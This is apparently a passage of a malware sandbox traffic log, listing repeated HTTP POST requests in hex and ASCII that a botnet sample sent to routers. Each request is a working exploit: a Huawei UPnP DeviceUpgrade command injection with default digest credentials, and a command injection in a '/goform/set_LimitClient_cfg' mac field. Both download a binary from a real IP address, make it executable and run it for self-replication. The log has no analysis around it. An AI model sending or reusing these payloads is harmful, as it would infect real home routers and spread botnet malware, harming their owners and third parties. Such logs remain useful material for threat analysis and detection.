3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://15.235.209.194/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
